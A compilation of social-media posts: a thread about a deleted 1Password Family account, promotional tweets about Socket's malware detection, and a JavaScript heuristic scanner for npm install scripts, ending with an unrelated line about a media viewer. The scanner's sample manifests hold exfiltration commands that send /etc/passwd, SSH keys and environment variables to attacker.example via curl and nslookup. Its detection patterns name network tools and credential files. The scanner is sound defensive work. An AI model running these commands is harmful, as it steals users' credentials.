My friend has a @1Password Family subscription and let the credit card lapse. She didn't notice the emails asking to update the card.
1Password completely deleted her account and logged her out on all devices. Now she can't access her 100+ passwords and 2FA tokens
WTF
I feel terrible because I recommended @1Password to her as I have to countless friends over the years.
For as long as I've used 1Password, their policy was to make passwords read-only when a license or subscription expires. Never to remotely wipe your passwords as punishment
She's now been logged out and had her passwords wiped on both her Mac and iOS devices and hasn't been able to access her accounts for several days.
@1Password support - can you fix this now, please?
The 1Password app should NEVER delete data. And it should ESPECIALLY never do so because of an expired credit card.
This completely destroys my trust in the app.
Imagine waking up tomorrow and all your data has been remotely wiped from your 1Password apps on all devices.
@1Password - If you're reading this, please DM me so I can share her account's email address. I would love to see you get to the bottom of this.
UPDATE: So here's what happened.
My friend added her brother as an Owner on the family plan. He signed up, tried 1Password for a day, and stopped using it.
1.5 years go by.
Then, the emails about an expired credit card start coming, but they're sent to both of them.
The brother sees the expired card emails for the Family account. By this time he has his own Individual 1Password account.
He thinks the emails are from that time he tried 1Password a few years ago, so he clicks a link in the email and deletes the account.
The Family account.
What's surprising is he was able to delete the whole Family account without logging in. It's the one action you can take as an Owner without logging in. You just need access to the email address.
No master password, no secret key.
Lesson: any Owner can delete the whole Family account, even one who hasn't logged in for years, forgot they're an Owner, and isn't actively using their user account anymore.
I recommend everyone audit who has Owner on your Family account. Remove anyone who isn't active anymore.
One more surprising detail:
Once the Family account was deleted, the local data was wiped from all the devices of the other members in the Family account.
Remote wiping makes sense for company accounts where you want to wipe when an employee leaves. But not for families.
If one family member gets tired of paying, switches away from 1Password, and deletes the account, then the other users in the family should have a happy path to get their data out.
They should still be able to access their passwords, even if in read-only mode.
1Password should have sent a message explaining that her Family account was deleted and asking if she wants to pay for an individual account, or switch into read-only mode, or something!
But wiping the *remote and local* data and saying "Account Deleted" is wrong.
Fortunately, 1Password can recover deleted accounts for 35 days after deletion. They're now working on doing that for her account.
But the bigger problem is that this wiping behavior clears the Secret Key from all the logged in devices.
Many users rely on their logged-in devices to produce their Secret Key so they can log in to new devices.
By logging out and wiping all devices, the user is forced to rely on their offline copy of the Secret Key (the Emergency Kit) to get back into their account.
So, even once 1Password restores the deleted account, anyone who didn't save their Emergency Kit (which is a terrible mistake, to be clear) might be locked out.
Lesson: this design should be improved.
Lesson: Double-check your Emergency Kit. Do you know where it is?
Still waiting for support to un-delete her account, but I'm hopeful that this story will have a happy ending now.
Huge thanks to the 1P employees who have been super helpful over DM.
I'm still planning to remain a 1Password customer.
Hopeful there are some lessons to be learned here that lead to better UX and give family members a way to keep their data when the owner deletes the account.
I'll update this thread once my friend is back into her account.
She’s back into her account! 🔥🔥
Thanks to 1Password for all the help!
Several employees, especially @zck, went above and beyond to personally help resolve this. And @jpgoldberg agreed that the way secret keys are handled for deleted family accounts can be improved.
❤️✨❤️✨
I wish more developers understood the constant stream of malware that is posted to npm, PyPI, and all package managers...
Here's just a taste of some crazy malware Socket identified in the past couple weeks...
All malware descriptions were FULLY WRITTEN by Socket AI.
This code is using curl to send the contents of the file '/etc/passwd' to a remote server. This is a highly suspicious and potentially malicious behavior as it could cause sensitive data to be sent to an attacker's server.
The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.
Read my latest post, featured in the @github ReadME project!
Do your part to secure the open source supply chain!
WE'RE JUST BEGINNING TO RECKON WITH NEW SECURITY RISKS INTRODUCED BY THE TANGLED WEB OF DEPENDENCIES IN OUR APPS.
Open source ecosystems have transformed 🔄 software development, but they also come with security 🛡 risks due to third-party dependencies. Supply chain attacks are now a significant threat. ⚠️
A supply chain attack involves malicious code 🦠 being injected into a vendor’s software. The rise in third-party dependencies and fast-paced updates 🚀 increases the chances of such attacks.
Our new Project Health Report helps security teams perform a full security audit of a repo. 🔐👩💻👨💻
📊 Unlike real-time Socket Alerts which monitor PRs, Project Health Reports analyze a repo and provide a full list of dependency risks. 📋⚠️
2/ 🕵️♀️ Security teams can use filters to focus on issues of a certain severity, such as "Critical" or "High" issues, or specific issues like "Network access", "Environment variable access" or "Filesystem access." 📈🔍
🤖 Socket AI: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
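The behaviours called out in these tweets (reading /etc/passwd and posting it with curl, shipping collected data in DNS queries, grabbing environment variables and tokens) and the severity and behaviour filters mentioned for Project Health Reports are exactly what a dependency scanner looks for in install-time scripts. As an added example that is not Socket's code and not part of the original thread, the block below is a small heuristic scanner over package.json manifests: it only inspects the lifecycle scripts npm runs automatically during install, evaluates each shell command separately so that "network access" plus "sensitive file" in the same command is promoted to "exfiltration", and supports the kind of severity and rule filtering the thread describes. The package names, hostnames, scripts and detection rules are all constructed assumptions for illustration.

```javascript
// Added example, not Socket's code. Heuristic scanner for npm lifecycle scripts.
// Every pattern, package name and hostname below is a constructed assumption.

// npm runs these scripts automatically when a dependency is installed;
// "build" or "test" scripts of a dependency do not run, so they are skipped.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

const SEVERITY_RANK = { none: 0, low: 1, medium: 2, high: 3, critical: 4 };

// Sub-patterns that the rules combine (illustrative, trivially evaded by obfuscation).
const P = {
  sensitivePath: /(\/etc\/(?:passwd|shadow)|\.ssh\/|\bid_rsa\b|\.npmrc|\.aws\/credentials|\.bash_history)/,
  network: /\b(?:curl|wget|nc|ncat)\b|https?:\/\/|\bfetch\(|https?\.request\(/,
  envAccess: /\bprintenv\b|process\.env|\$\{?[A-Z_]*(?:TOKEN|SECRET|KEY|PASS|HOME)\b/,
  // a DNS lookup tool whose argument is built from a variable or subshell
  dnsTool: /\b(?:nslookup|dig|host)\b[^\n]*(?:\$\(|`|\$[A-Za-z_{])|dns\.(?:resolve|lookup)\(/,
  recon: /\b(?:uname|hostname|whoami|ifconfig|ip\s+(?:addr|a|route))\b/,
};

// Rules are evaluated against ONE shell command at a time so that network access
// and a sensitive file co-occurring in the same command count as exfiltration.
const RULES = [
  { id: "http-exfiltration", severity: "critical", test: c => P.network.test(c) && P.sensitivePath.test(c) },
  { id: "dns-exfiltration", severity: "critical", test: c => P.dnsTool.test(c) },
  { id: "sensitive-file-access", severity: "high", test: c => P.sensitivePath.test(c) },
  { id: "network-access", severity: "high", test: c => P.network.test(c) },
  { id: "environment-variable-access", severity: "medium", test: c => P.envAccess.test(c) },
  { id: "system-recon", severity: "medium", test: c => P.recon.test(c) },
];

// Rough split of a shell one-liner into commands (on ; && || | and newlines).
function splitCommands(script) {
  return script.split(/\s*(?:;|&&|\|\||\||\n)\s*/).map(c => c.trim()).filter(Boolean);
}

// Scan one package.json object; returns findings plus the worst severity seen.
function scanPackage(pkg) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const script = pkg.scripts && pkg.scripts[hook];
    if (!script) continue;
    for (const command of splitCommands(script)) {
      for (const rule of RULES) {
        if (rule.test(command)) findings.push({ rule: rule.id, severity: rule.severity, hook, command });
      }
    }
  }
  const maxSeverity = findings.reduce(
    (max, f) => (SEVERITY_RANK[f.severity] > SEVERITY_RANK[max] ? f.severity : max), "none");
  return { name: pkg.name, version: pkg.version, findings, maxSeverity };
}

// Filter a report the way a "Critical"/"High" or per-behaviour view would.
function filterFindings(report, { minSeverity = "low", ruleIds = null } = {}) {
  return report.findings.filter(f =>
    SEVERITY_RANK[f.severity] >= SEVERITY_RANK[minSeverity] && (!ruleIds || ruleIds.includes(f.rule)));
}

// Constructed sample manifests (not real packages).
const SAMPLE_PACKAGES = [
  { name: "totally-legit-utils", version: "1.0.3",
    scripts: { postinstall: "curl -s -X POST --data-binary @/etc/passwd https://attacker.example/collect" } },
  { name: "colorz", version: "0.0.1",
    scripts: { preinstall: "printenv > /tmp/.e; for c in $(cat ~/.ssh/id_rsa /tmp/.e | base64 -w0 | fold -w 60); do nslookup $c.x.attacker.example; done; uname -a" } },
  { name: "left-pad-ish", version: "2.0.0",
    scripts: { postinstall: "node scripts/postinstall.js", build: "node scripts/build.js", test: "mocha" } },
];

function scanAll(packages = SAMPLE_PACKAGES) {
  return packages.map(scanPackage);
}

for (const report of scanAll()) {
  console.log(`${report.name}@${report.version}: ${report.maxSeverity} (${report.findings.length} findings)`);
  for (const f of report.findings) console.log(`  [${f.severity}] ${f.rule} in ${f.hook}: ${f.command}`);
}
```

Two caveats a practitioner would add. First, regex heuristics like these are defeated by the most basic obfuscation (base64-encoded commands, `eval`, code hidden in the package's JavaScript rather than in package.json), which is why real tooling also analyses the shipped code. Second, the cheapest mitigation is independent of any scanner: `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) stops dependency lifecycle scripts from running at all, at the cost of breaking packages that legitimately need them.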
I started by rendering the media viewer for a specific file type (I used .txt randomly). For all other file types, I wanted it to "fall through" to the standard click handler.